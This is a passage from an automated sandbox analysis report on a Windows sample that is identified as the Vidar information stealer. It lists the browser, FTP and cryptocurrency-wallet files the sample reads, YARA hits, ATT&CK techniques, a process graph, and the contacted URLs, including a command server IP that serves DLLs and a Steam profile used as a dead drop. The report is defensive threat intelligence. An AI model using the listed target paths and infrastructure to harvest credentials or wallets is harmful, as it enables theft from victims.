              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
              Source: Yara matchFile source: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5768, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected Vidar
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Yara detected Vidar stealer
              Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.130000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7144, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5768, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CE20C40 sqlite3_bind_zeroblob,2_2_6CE20C40
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CE20D60 sqlite3_bind_parameter_name,2_2_6CE20D60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CD48EA0 sqlite3_clear_bindings,2_2_6CD48EA0

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		2
              OS Credential Dumping              		2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		2
              Ingress Tool Transfer              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Native API              		Boot or Logon Initialization Scripts511
              Process Injection              		2
              Obfuscated Files or Information              		1
              Credentials in Registry              		1
              Account Discovery              		Remote Desktop Protocol4
              Data from Local System              		21
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              DLL Side-Loading              		Security Account Manager4
              File and Directory Discovery              		SMB/Windows Admin Shares1
              Screen Capture              		3
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Masquerading              		NTDS55
              System Information Discovery              		Distributed Component Object ModelInput Capture114
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Virtualization/Sandbox Evasion              		LSA Secrets1
              Network Share Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts511
              Process Injection              		Cached Domain Credentials141
              Security Software Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
              Virtualization/Sandbox Evasion              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem12
              Process Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
              System Owner/User Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1445903 Sample: file.exe Startdate: 22/05/2024 Architecture: WINDOWS Score: 100 31 steamcommunity.com 2->31 37 Found malware configuration 2->37 39 Malicious sample detected (through community Yara rule) 2->39 41 Antivirus / Scanner detection for submitted sample 2->41 43 8 other signatures 2->43 9 file.exe 2->9         started        signatures3 process4 signatures5 45 Contains functionality to inject code into remote processes 9->45 47 Writes to foreign memory regions 9->47 49 Allocates memory in foreign processes 9->49 51 Injects a PE file into a foreign processes 9->51 12 RegAsm.exe 1 46 9->12         started        process6 dnsIp7 33 steamcommunity.com 23.197.127.21, 443, 49699 AKAMAI-ASN1EU United States 12->33 35 78.47.123.174, 443, 49700, 49701 HETZNER-ASDE Germany 12->35 23 C:\Users\user\AppData\...\vcruntime140[1].dll, PE32 12->23 dropped 25 C:\Users\user\AppData\...\softokn3[1].dll, PE32 12->25 dropped 27 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 12->27 dropped 29 10 other files (none is malicious) 12->29 dropped 53 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->53 55 Found many strings related to Crypto-Wallets (likely being stolen) 12->55 57 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 12->57 59 6 other signatures 12->59 17 cmd.exe 1 12->17         started        file8 signatures9 process10 process11 19 conhost.exe 17->19         started        21 timeout.exe 1 17->21         started       

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe100%AviraHEUR/AGEN.1317026
              file.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\ProgramData\DBFCBGCGIJKJ\freebl3.dll0%ReversingLabs
              C:\ProgramData\DBFCBGCGIJKJ\mozglue.dll0%ReversingLabs
              C:\ProgramData\DBFCBGCGIJKJ\msvcp140.dll0%ReversingLabs
              C:\ProgramData\DBFCBGCGIJKJ\nss3.dll0%ReversingLabs
              C:\ProgramData\DBFCBGCGIJKJ\softokn3.dll0%ReversingLabs
              C:\ProgramData\DBFCBGCGIJKJ\vcruntime140.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\sqls[1].dll0%ReversingLabs
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\freebl3[1].dll0%ReversingLabs
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\mozglue[1].dll0%ReversingLabs
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\msvcp140[1].dll0%ReversingLabs
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\nss3[1].dll0%ReversingLabs
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\softokn3[1].dll0%ReversingLabs
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dll0%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
              https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli0%URL Reputationsafe
              https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE0%URL Reputationsafe
              http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
              https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
              https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&0%URL Reputationsafe
              https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&l=0%URL Reputationsafe
              http://www.mozilla.com/en-US/blocklist/0%URL Reputationsafe
              https://mozilla.org0/0%URL Reputationsafe
              https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&0%URL Reputationsafe
              http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
              https://store.steampowered.com/points/shop/0%URL Reputationsafe
              https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK0%URL Reputationsafe
              https://www.ecosia.org/newtab/0%URL Reputationsafe
              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
              https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
              https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
              https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt0%URL Reputationsafe
              https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620160%URL Reputationsafe
              https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b0%URL Reputationsafe
              https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
              https://store.steampowered.com/about/0%URL Reputationsafe
              https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&0%URL Reputationsafe
              https://help.steampowered.com/en/0%URL Reputationsafe
              https://store.steampowered.com/news/0%URL Reputationsafe
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
              http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
              https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=0%URL Reputationsafe
              https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg0%URL Reputationsafe
              https://store.steampowered.com/stats/0%URL Reputationsafe
              https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp0%URL Reputationsafe
              https://store.steampowered.com/steam_refunds/0%URL Reputationsafe
              https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif0%URL Reputationsafe
              https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v0%URL Reputationsafe
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
              https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p0%URL Reputationsafe
              https://store.steampowered.com/legal/0%URL Reputationsafe
              http://www.sqlite.org/copyright.html.0%URL Reputationsafe
              https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=engl0%URL Reputationsafe
              https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=0%URL Reputationsafe
              https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engli0%URL Reputationsafe
              https://store.steampowered.com/0%URL Reputationsafe
              https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_0%URL Reputationsafe
              https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
              https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%URL Reputationsafe
              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0%URL Reputationsafe
              http://store.steampowered.com/account/cookiepreferences/0%URL Reputationsafe
              https://store.steampowered.com/mobile0%URL Reputationsafe
              https://support.mozilla.org0%URL Reputationsafe
              https://steamcommunity.com/?subsection=broadcasts0%Avira URL Cloudsafe
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
              https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
              https://78.47.123.1740%Avira URL Cloudsafe
              https://78.47.123.174/nss3.dll0%Avira URL Cloudsafe
              https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV0%Avira URL Cloudsafe
              https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
              https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=7tll0%Avira URL Cloudsafe
              https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&0%Avira URL Cloudsafe
              https://78.47.123.174/mozglue.dll0%Avira URL Cloudsafe
              https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js0%Avira URL Cloudsafe
              https://steamcommunity.com/m0%Avira URL Cloudsafe
              https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&0%Avira URL Cloudsafe
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
              https://78.47.123.174;0%Avira URL Cloudsafe
              https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp0%Avira URL Cloudsafe
              https://78.47.123.174/freebl3.dll0%Avira URL Cloudsafe
              https://t.me/copterwin0%Avira URL Cloudsafe
              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi0%Avira URL Cloudsafe
              https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&0%Avira URL Cloudsafe
              https://78.47.123.174/msvcp140.dll0%Avira URL Cloudsafe
              https://steamcommunity.com/profiles/765611996897178990%Avira URL Cloudsafe
              https://steamcommunity.com/my/wishlist/0%Avira URL Cloudsafe
              https://steamcommunity.com/market/0%Avira URL Cloudsafe
              https://community.cloudflare.steamstatic.com/public/shared/images/responsive/heade0%Avira URL Cloudsafe
              https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta0%Avira URL Cloudsafe
              https://78.47.123.174HCAF0%Avira URL Cloudsafe
              https://78.47.123.174/0%Avira URL Cloudsafe
              https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&l=englis0%Avira URL Cloudsafe
              https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org0%Avira URL Cloudsafe
              https://78.47.123.174/sqls.dll0%Avira URL Cloudsafe
              https://steamcommunity.com/discussions/0%Avira URL Cloudsafe
              https://steamcommunity.com/workshop/0%Avira URL Cloudsafe
              https://steamcommunity.com/profiles/76561199689717899/badges0%Avira URL Cloudsafe
              https://steamcommunity.com/profiles/76561199689717899/inventory/0%Avira URL Cloudsafe
              https://78.47.123.174/vcruntime140.dll0%Avira URL Cloudsafe
              https://78.47.123.174/softokn3.dll0%Avira URL Cloudsafe
              https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
              https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=en0%Avira URL Cloudsafe
              https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&am0%Avira URL Cloudsafe
              https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=Hpc3R3GOIT0%Avira URL Cloudsafe
              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.0%Avira URL Cloudsafe
              https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=1rP88j3WZLBx&amp0%Avira URL Cloudsafe
              https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%Avira URL Cloudsafe
              https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b30%Avira URL Cloudsafe
              https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&l=engli0%Avira URL Cloudsafe
              https://78.47.123.174/sqls.dllb0%Avira URL Cloudsafe
              https://78.47.123.174DBKE0%Avira URL Cloudsafe
              https://steamcommunity.com/login/ho0%Avira URL Cloudsafe
              https://steamcommunity.com/login/home/?goto=profiles%2F765611996897178990%Avira URL Cloudsafe
              https://steamcommunity.com/0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              steamcommunity.com
              		23.197.127.21
              		truetrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://78.47.123.174/nss3.dllfalse
                • Avira URL Cloud: safe
                		unknown
                https://78.47.123.174/mozglue.dllfalse
                • Avira URL Cloud: safe
                		unknown
                https://78.47.123.174/freebl3.dllfalse
                • Avira URL Cloud: safe
                		unknown
                https://78.47.123.174/msvcp140.dllfalse
                • Avira URL Cloud: safe
                		unknown
                https://steamcommunity.com/profiles/76561199689717899true
                • Avira URL Cloud: safe
                		unknown
                https://78.47.123.174/false
                • Avira URL Cloud: safe
                		unknown
                https://78.47.123.174/sqls.dllfalse
                • Avira URL Cloud: safe
                		unknown
                https://78.47.123.174/softokn3.dllfalse
                • Avira URL Cloud: safe
                		unknown
                https://78.47.123.174/vcruntime140.dllfalse
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://duckduckgo.com/chrome_newtabHCFIJK.2.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://duckduckgo.com/ac/?q=HCFIJK.2.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://steamcommunity.com/?subsection=broadcastsRegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcVRegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://store.steampowered.com/subscriber_agreement/RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • URL Reputation: safe
                		unknown
                https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=7tllRegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engliRegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • URL Reputation: safe
                		unknown
                https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpERegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • URL Reputation: safe
                		unknown
                http://www.valvesoftware.com/legal.htmRegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • URL Reputation: safe
                		unknown
                https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackRegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • URL Reputation: safe
                		unknown
                https://78.47.123.17476561199689717899[1].htm.2.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://t.me/copterwinfile.exe, 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • URL Reputation: safe
                		unknown
                https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&l=RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • URL Reputation: safe
                		unknown
                http://www.mozilla.com/en-US/blocklist/RegAsm.exe, RegAsm.exe, 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.drfalse
                • URL Reputation: safe
                		unknown
                https://steamcommunity.com/mRegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://mozilla.org0/freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drfalse
                • URL Reputation: safe
                		unknown
                https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • URL Reputation: safe
                		unknown
                http://store.steampowered.com/privacy_agreement/RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • URL Reputation: safe
                		unknown
                https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiFIEHII.2.drfalse
                • Avira URL Cloud: safe
                		unknown
